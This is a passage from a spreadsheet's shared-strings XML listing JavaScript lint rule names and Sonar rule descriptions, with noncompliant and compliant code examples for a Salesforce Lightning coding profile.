    <t>cs-js:no-underscore-dangle</t>
  </si>
  <si>
    <t>cs-js:new-parens</t>
  </si>
  <si>
    <t>cs-js:aura-api</t>
  </si>
  <si>
    <t>cs-js:no-sparse-arrays</t>
  </si>
  <si>
    <t>cs-js:no-plusplus</t>
  </si>
  <si>
    <t>cs-js:no-ex-assign</t>
  </si>
  <si>
    <t>cs-js:no-invalid-regexp</t>
  </si>
  <si>
    <t>cs-js:secure-window</t>
  </si>
  <si>
    <t>cs-js:unknown</t>
  </si>
  <si>
    <t>cs-js:no-extra-boolean-cast</t>
  </si>
  <si>
    <t>cs-js:valid-typeof</t>
  </si>
  <si>
    <t>cs-js:no-eq-null</t>
  </si>
  <si>
    <t>cs-js:no-iterator</t>
  </si>
  <si>
    <t>cs-js:no-label-var</t>
  </si>
  <si>
    <t>cs-js:no-proto</t>
  </si>
  <si>
    <t>cs-js:no-constant-condition</t>
  </si>
  <si>
    <t>cs-js:no-new</t>
  </si>
  <si>
    <t>cs-js:dot-notation</t>
  </si>
  <si>
    <t>cs-js:no-throw-literal</t>
  </si>
  <si>
    <t>cs-js:handle-callback-err</t>
  </si>
  <si>
    <t>cs-js:no-global-assign</t>
  </si>
  <si>
    <t>cs-js:unsecure-js-dependency</t>
  </si>
  <si>
    <t>cs-js:npm-audit</t>
  </si>
  <si>
    <t>cs-js:eqeqeq</t>
  </si>
  <si>
    <t>cs-js:exception</t>
  </si>
  <si>
    <t>cs-js:no-else-return</t>
  </si>
  <si>
    <t>cs-js:no-self-compare</t>
  </si>
  <si>
    <t>cs-js:no-script-url</t>
  </si>
  <si>
    <t>cs-js:no-return-assign</t>
  </si>
  <si>
    <t>cs-js:no-unreachable</t>
  </si>
  <si>
    <t>cs-js:no-irregular-whitespace</t>
  </si>
  <si>
    <t>cs-js:no-unused-expressions</t>
  </si>
  <si>
    <t>cs-js:no-param-reassign</t>
  </si>
  <si>
    <t>Sonar JAVASCRIPT RULES (Used in Salesforce Lightning Profile)</t>
  </si>
  <si>
    <t>javascript:S1488</t>
  </si>
  <si>
    <t>Local variables should not be declared and then immediately returned or thrown</t>
  </si>
  <si>
    <t>&lt;p&gt;Declaring a variable only to immediately return or throw it is a bad practice.&lt;/p&gt;
&lt;p&gt;Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this
variable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to
know exactly what will be returned.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function computeDurationInMilliseconds() {
  var duration = (((hours * 60) + minutes) * 60 + seconds ) * 1000 ;
  return duration;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function computeDurationInMilliseconds() {
  return (((hours * 60) + minutes) * 60 + seconds ) * 1000 ;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1994</t>
  </si>
  <si>
    <t>"for" loop increment clauses should modify the loops' counters</t>
  </si>
  <si>
    <t>&lt;p&gt;It can be extremely confusing when a &lt;code&gt;for&lt;/code&gt; loopâ€™s counter is incremented outside of its increment clause. In such cases, the increment
should be moved to the loopâ€™s increment clause if at all possible.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (i = 0; i &amp;lt; 10; j++) { // Noncompliant
  // ...
  i++;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
for (i = 0; i &amp;lt; 10; i++, j++) {
  // ...
}
&lt;/pre&gt;
&lt;p&gt;Or&lt;/p&gt;
&lt;pre&gt;
for (i = 0; i &amp;lt; 10; i++) {
  // ...
  j++;
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1774</t>
  </si>
  <si>
    <t>The ternary operator should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;While the ternary operator is pleasingly compact, its use can make code more difficult to read. It should therefore be avoided in favor of the more
verbose &lt;code&gt;if&lt;/code&gt;/&lt;code&gt;else&lt;/code&gt; structure.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo(a) {
  var b = (a === 'A') ? 'is A' : 'is not A'; // Noncompliant
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo(a) {
  var b;
  if (a === 'A') {
    b = 'is A';
  }
  else {
    b = 'is not A';
  }
  // ...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S139</t>
  </si>
  <si>
    <t>Comments should not be located at the end of lines of code</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule verifies that single-line comments are not located at the ends of lines of code. The main idea behind this rule is that in order to be
really readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of
the code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.
Comments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var a1 = b + c; // This is a trailing comment that can be very very long
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
// This very long comment is better placed before the line of code
var a2 = b + c;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3760</t>
  </si>
  <si>
    <t>Arithmetic operators should only have numbers as operands</t>
  </si>
  <si>
    <t>&lt;p&gt;Expressions with arithmetic (&lt;code&gt;/, *, %, ++, --, -, -=, *=, /=, %=, +=, +&lt;/code&gt;), unary (&lt;code&gt;-&lt;/code&gt;), or comparison operators (&lt;code&gt;&amp;gt;,
&amp;lt;, &amp;gt;=, &amp;lt;=&lt;/code&gt;) where one, or both, of the operands is a String, Boolean or Date value rely on implicit conversions. Both the
maintainability and reliability levels of such a piece of code are questionable.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
str = "80";
quarter = str / 4; // Noncompliant
if (str &amp;lt; 10) { // Noncompliant
   // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
str = "80";
parsedStr = parseInt(str);
quarter = parsedStr / 4;
if (parsedStr &amp;lt; 10) {
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Expressions using the binary &lt;code&gt;+&lt;/code&gt; operator with at least one &lt;code&gt;String&lt;/code&gt; operand are ignored because the &lt;code&gt;+&lt;/code&gt;
  operator will perform a concatenation in that case. &lt;/li&gt;
  &lt;li&gt; Comparisons where both operands are strings are ignored because a lexicographical comparison is performed in that case. &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1186</t>
  </si>
  <si>
    <t>Functions should not be empty</t>
  </si>
  <si>
    <t>&lt;p&gt;There are several reasons for a function not to have a function body:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; It is an unintentional omission, and should be fixed to prevent an unexpected behavior in production. &lt;/li&gt;
  &lt;li&gt; It is not yet, or never will be, supported. In this case an exception should be thrown in languages where that mechanism is available. &lt;/li&gt;
  &lt;li&gt; The method is an intentionally-blank override. In this case a nested comment should explain the reason for the blank override. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function foo() {
}
var foo = () =&amp;gt; {};
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function foo() {
    // This is intentional
}
var foo = () =&amp;gt; {
    do_something();
};
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2432</t>
  </si>
  <si>
    <t>Setters should not return values</t>
  </si>
  <si>
    <t>&lt;p&gt;Functions declared with the &lt;code&gt;set&lt;/code&gt; keyword will automatically return the values they were passed. Thus any value explicitly returned from
a setter will be ignored, and explicitly returning a value is an error.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var person = {
  // ...
  set name(name) {
    this.name = name;
    return 42;  // Noncompliant
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var person = {
  // ...
  set name(name) {
    this.name = name;
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3524</t>
  </si>
  <si>
    <t>Braces and parentheses should be used consistently with arrow functions</t>
  </si>
  <si>
    <t>&lt;p&gt;Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does
not conform to the configured requirements.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;With the configured defaults forbidding parentheses&lt;/p&gt;
&lt;pre&gt;
var foo = (a) =&amp;gt; { /* ... */ };  // Noncompliant; remove parens from arg
var bar = (a, b) =&amp;gt; { return 0; };  // Noncompliant; remove curly braces from body
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var foo = a =&amp;gt; { /* ... */ };
var bar = (a, b) =&amp;gt; 0;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3403</t>
  </si>
  <si>
    <t>Strict equality operators should not be used with dissimilar types</t>
  </si>
  <si>
    <t>&lt;p&gt;Comparing dissimilar types using the strict equality operators &lt;code&gt;===&lt;/code&gt; and &lt;code&gt;!==&lt;/code&gt; will always return the same value,
respectively &lt;code&gt;false&lt;/code&gt; and &lt;code&gt;true&lt;/code&gt;, because no type conversion is done before the comparison. Thus, such comparisons can only be
bugs.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var a = 8;
var b = "8";
if (a === b) {  // Noncompliant; always false
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var a = 8;
var b = "8";
if (a == b) {
  // ...
}
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
var a = 8;
var b = "8";
if (a === Number(b)) {
  // ...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S107</t>
  </si>
  <si>
    <t>Functions should not have too many parameters</t>
  </si>
  <si>
    <t>&lt;p&gt;A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many
things.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;With a maximum number of 4 parameters:&lt;/p&gt;
&lt;pre&gt;
function doSomething(param1, param2, param3, param4, param5) {
...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function doSomething(param1, param2, param3, param4) {
...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1438</t>
  </si>
  <si>
    <t>Statements should end with semicolons</t>
  </si>
  <si>
    <t>&lt;p&gt;In JavaScript, the semicolon (&lt;code&gt;;&lt;/code&gt;) is optional as a statement separator, but omitting semicolons can be confusing, and lead to
unexpected results because a semicolon is implicitly inserted at the end of each line.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function fun() {
  return  // Noncompliant. ';' implicitly inserted at end of line
       5   // Noncompliant. ';' implicitly inserted at end of line
}
print(fun());  // prints "undefined", not "5"
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function fun() {
  return 5;
}
print(fun());
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1441</t>
  </si>
  <si>
    <t>Quotes for string literals should be used consistently</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule checks that all string literals use the same kind of quotes.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;Using the parameter default (forcing single quotes):&lt;/p&gt;
&lt;pre&gt;
var firstParameter = "something"; // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var firstParameter = 'something';
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Strings that contain quotes are ignored.&lt;/p&gt;
&lt;pre&gt;
let heSaid = "Then he said 'What?'."  // ignored
let sheSaid = '"Whatever!" she replied.'  // ignored
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3812</t>
  </si>
  <si>
    <t>Results of "in" and "instanceof" should be negated rather than operands</t>
  </si>
  <si>
    <t>&lt;p&gt;Mixing up the order of operations will almost always yield unexpected results.&lt;/p&gt;
&lt;p&gt;Similarly, mis-applied negation will also yield bad results. For instance consider the difference between &lt;code&gt;!key in dict&lt;/code&gt; and &lt;code&gt;!(key
in dict)&lt;/code&gt;. The first looks for a boolean value (&lt;code&gt;!key&lt;/code&gt;) in &lt;code&gt;dict&lt;/code&gt;, and the other looks for a string and inverts the
result. &lt;code&gt;!obj instanceof SomeClass&lt;/code&gt; has the same problem.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when the left operand of an &lt;code&gt;in&lt;/code&gt; or &lt;code&gt;instanceof&lt;/code&gt; operator is negated.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (!"prop" in myObj) {  // Noncompliant;  "in" operator is checking property "false"
  doTheThing();  // this block will be never executed
}
if (!foo instanceof MyClass) {  // Noncompliant; "!foo" returns a boolean, which is not an instance of anything
  doTheOtherThing();  // this block is never executed
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (!("prop" in myObj)) {
  doTheThing();
}
if (!(foo instanceof MyClass)) {
  doTheOtherThing();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1539</t>
  </si>
  <si>
    <t>"strict" mode should be used with caution</t>
  </si>
  <si>
    <t>&lt;p&gt;Even though it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not
support it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not
support it.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function strict() {
  'use strict';
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3686</t>
  </si>
  <si>
    <t>Functions should not be called both with and without "new"</t>
  </si>
  <si>
    <t>&lt;p&gt;Constructor functions, which create new object instances, must only be called with &lt;code&gt;new&lt;/code&gt;. Non-constructor functions must not. Mixing
these two usages could lead to unexpected results at runtime.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function getNum() {
  return 5;
}
function Num(numeric, alphabetic) {
  this.numeric = numeric;
  this.alphabetic = alphabetic;
}
var myFirstNum = getNum();
var my2ndNum = new getNum();  // Noncompliant. An empty object is returned, NOT 5
var myNumObj1 = new Num();
var myNumObj2 = Num();  // Noncompliant. undefined is returned, NOT an object
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S113</t>
  </si>
  <si>
    <t>Files should contain an empty newline at the end</t>
  </si>
  <si>
    <t>&lt;p&gt;Some tools work better when files end with an empty line.&lt;/p&gt;
&lt;p&gt;This rule simply generates an issue if it is missing.&lt;/p&gt;
&lt;p&gt;For example, a Git diff looks like this if the empty line is missing at the end of the file:&lt;/p&gt;
&lt;pre&gt;
+class Test {
+}
\ No newline at end of file
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1541</t>
  </si>
  <si>
    <t>Cyclomatic Complexity of functions should not be too high</t>
  </si>
  <si>
    <t>&lt;p&gt;The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test
thoroughly.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S100</t>
  </si>
  <si>
    <t>Function and method names should comply with a naming convention</t>
  </si>
  <si>
    <t>&lt;p&gt;Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;With the default regular expression &lt;code&gt;^[a-z][a-zA-Z0-9]*$&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;
function DoSomething(){...}  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function doSomething(){...}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S105</t>
  </si>
  <si>
    <t>Tabulation characters should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Developers should not need to configure the tab width of their text editors in order to be able to read source code.&lt;/p&gt;
&lt;p&gt;So the use of the tabulation character must be banned.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S3786</t>
  </si>
  <si>
    <t>Template literal placeholder syntax should not be used in regular strings</t>
  </si>
  <si>
    <t>&lt;p&gt;Template strings allow developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is
done by using expressions like &lt;code&gt;${variable} &lt;/code&gt; in a string between two back-ticks (&lt;code&gt;`&lt;/code&gt;). However, when used in a regular string
literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is probably not what was
intended.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
console.log("Today is ${date}"); // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
console.log(`Today is ${date}`);
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1126</t>
  </si>
  <si>
    <t>Return of boolean expressions should not be wrapped into an "if-then-else" statement</t>
  </si>
  <si>
    <t>&lt;p&gt;Return of boolean literal statements wrapped into &lt;code&gt;if-then-else&lt;/code&gt; ones should be simplified.&lt;/p&gt;
&lt;p&gt;Note that if the result of the expression is not a boolean but for instance an integer, then double negation should be used for proper
conversion.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (expression) {
  return true;
} else {
  return false;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
return expression;
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
return !!expression;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2208</t>
  </si>
  <si>
    <t>Wildcard imports should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;On the principle that clearer code is better code, you should explicitly &lt;code&gt;import&lt;/code&gt; the things you want to use in a module. Using
&lt;code&gt;import *&lt;/code&gt; imports everything in the module, and runs the risk of confusing maintainers. Similarly, &lt;code&gt;export * from "module";&lt;/code&gt;
imports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
import * as Imported from "aModule";  // Noncompliant
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1066</t>
  </si>
  <si>
    <t>Collapsible "if" statements should be merged</t>
  </si>
  <si>
    <t>&lt;p&gt;Merging collapsible &lt;code&gt;if&lt;/code&gt; statements increases the codeâ€™s readability.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (x != undefined) {
  if (y === 2) {
    // ...
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (x != undefined &amp;amp;&amp;amp; y === 2) {
  // ...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3531</t>
  </si>
  <si>
    <t>Generators should "yield" something</t>
  </si>
  <si>
    <t>&lt;p&gt;A generator without a &lt;code&gt;yield&lt;/code&gt; statement is at best confusing, and at worst a bug in your code, since the iterator produced by your code
will always be empty.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function* myGen(a, b) {  // Noncompliant
  let answer = 0;
  answer += a * b;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function* myGen(a, b) {
  let answer = 0;
  while (answer &amp;lt; 42) {
    answer += a * b;
    yield answer;
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3498</t>
  </si>
  <si>
    <t>Object literal shorthand syntax should be used</t>
  </si>
  <si>
    <t>&lt;p&gt;When an already-defined variable is given the same name within a new object, object-shorthand syntax is preferred as being more compact. Similarly,
object-shorthand is also preferred for the definition of functions in object literals.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let a = 1;
let myObj = {
  a : a,  // Noncompliant
  fun: function () {  // Noncompliant
    //...
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let a = 1;
let myObj = {
  a,
  fun () {
    //...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3533</t>
  </si>
  <si>
    <t>"import" should be used to include external code</t>
  </si>
  <si>
    <t>&lt;p&gt;Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. Fortunately,
ES2015, provides language-standard mechanisms for module management, &lt;code&gt;import&lt;/code&gt; and &lt;code&gt;export&lt;/code&gt;, and older usages should be
converted.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
// circle.js
exports.area = function (r) {
  return PI * r * r;
};
// foo.js
define(["./cart", "./horse"], function(cart, horse) {  // Noncompliant
  // ...
});
// bar.js
const circle = require('./circle.js');  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
// circle.js
let area = function (r) {
  return PI * r * r;
}
export default area;
// foo.js
import cart from "./cart.js";
import horse from "./horse.js";
// bar.js
import circle from "./circle.js"
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2260</t>
  </si>
  <si>
    <t>JavaScript parser failure</t>
  </si>
  <si>
    <t>&lt;p&gt;When the JavaScript parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the
number of files that do not parse but also to easily find out why they do not parse.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1442</t>
  </si>
  <si>
    <t>"alert(...)" should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;alert(...)&lt;/code&gt; as well as &lt;code&gt;confirm(...)&lt;/code&gt; and &lt;code&gt;prompt(...)&lt;/code&gt; can be useful for debugging during development, but in
production mode this kind of pop-up could expose sensitive information to attackers, and should never be displayed.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if(unexpectedCondition) {
  alert("Unexpected Condition");
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated; use {rule:javascript:S4507} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2688</t>
  </si>
  <si>
    <t>"NaN" should not be used in comparisons</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;NaN&lt;/code&gt; is not equal to anything, even itself. Testing for equality or inequality against &lt;code&gt;NaN&lt;/code&gt; will yield predictable results,
but probably not the ones you want.&lt;/p&gt;
&lt;p&gt;Instead, the best way to see whether a variable is equal to &lt;code&gt;NaN&lt;/code&gt; is to use &lt;code&gt;Number.isNaN()&lt;/code&gt;, since ES2015, or (perhaps
counter-intuitively) to compare it to itself. Since &lt;code&gt;NaN !== NaN&lt;/code&gt;, when &lt;code&gt;a !== a&lt;/code&gt;, you know it must equal &lt;code&gt;NaN&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var a = NaN;
if (a === NaN) {  // Noncompliant; always false
  console.log("a is not a number");  // this is dead code
}
if (a !== NaN) { // Noncompliant; always true
  console.log("a is not NaN"); // this statement is not necessarily true
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (Number.isNaN(a)) {
  console.log("a is not a number");
}
if (!Number.isNaN(a)) {
  console.log("a is not NaN");
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1535</t>
  </si>
  <si>
    <t>"for...in" loops should filter properties before acting on them</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;for...in&lt;/code&gt; statement allows you to loop through the names of all of the properties of an object. The list of properties includes all
those properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data
properties. Programs that donâ€™t take this into account can fail.&lt;/p&gt;
&lt;p&gt;Therefore, the body of every &lt;code&gt;for...in&lt;/code&gt; statement should be wrapped in an &lt;code&gt;if&lt;/code&gt; statement that filters which properties are
acted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (name in object) {
    doSomething(name);  // Noncompliant
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
for (name in object) {
  if (object.hasOwnProperty(name)) {
    doSomething(name);
  }
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Loops used to clone objects are ignored.&lt;/p&gt;
&lt;pre&gt;
for (prop in obj) {
  a[prop] = obj[prop];  // Compliant by exception
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3785</t>
  </si>
  <si>
    <t>"in" should not be used with primitive types</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;in&lt;/code&gt; operator tests whether the specified property is in the specified object.&lt;/p&gt;
&lt;p&gt;If the right operand is a of primitive type (i.e., not an object) the &lt;code&gt;in&lt;/code&gt; operator raises a &lt;code&gt;TypeError&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var x = "Foo";
"length" in x; // Noncompliant: TypeError
0 in x;        // Noncompliant: TypeError
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var x = new String("Foo");
"length" in x;    // true
0 in x;           // true
"foobar" in x;    // false
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3854</t>
  </si>
  <si>
    <t>"super()" should be invoked appropriately</t>
  </si>
  <si>
    <t>&lt;p&gt;There are situations where &lt;code&gt;super()&lt;/code&gt; must be invoked and situations where &lt;code&gt;super()&lt;/code&gt; cannot be invoked.&lt;/p&gt;
&lt;p&gt;The basic rule is: a constructor in a non-derived class cannot invoke &lt;code&gt;super()&lt;/code&gt;; a constructor in a derived class must invoke
&lt;code&gt;super()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Furthermore:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;super()&lt;/code&gt; must be invoked before the &lt;code&gt;this&lt;/code&gt; and &lt;code&gt;super&lt;/code&gt; keywords can be used. &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;super()&lt;/code&gt; must be invoked with the same number of arguments as the base class' constructor. &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;super()&lt;/code&gt; can only be invoked in a constructor - not in any other method. &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;super()&lt;/code&gt; cannot be invoked multiple times in the same constructor. &lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Known Limitations&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt; False negatives: some issues are not raised if the base class is not defined in the same file as the current class. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
class Dog extends Animal {
  constructor(name) {
    super();
    this.name = name;
    super();         // Noncompliant
    super.doSomething();
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
class Dog extends Animal {
  constructor(name) {
    super();
    this.name = name;
    super.doSomething();
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1219</t>
  </si>
  <si>
    <t>"switch" statements should not contain non-case labels</t>
  </si>
  <si>
    <t>&lt;p&gt;Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing
error.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;Case 1, the code is syntactically correct but the behavior is not the expected one&lt;/p&gt;
&lt;pre&gt;
switch (day) {
  case MONDAY:
  case TUESDAY:
  WEDNESDAY:   // instead of "case WEDNESDAY"
    doSomething();
    break;
  ...
}
&lt;/pre&gt;
&lt;p&gt;Case 2, the code is correct and behaves as expected but is hardly readable&lt;/p&gt;
&lt;pre&gt;
switch (day) {
  case MONDAY:
    break;
  case TUESDAY:
    foo:for(i = 0 ; i &amp;lt; X ; i++) {
         /* ... */
        break foo;  // this break statement doesn't relate to the nesting case TUESDAY
         /* ... */
    }
    break;
    /* ... */
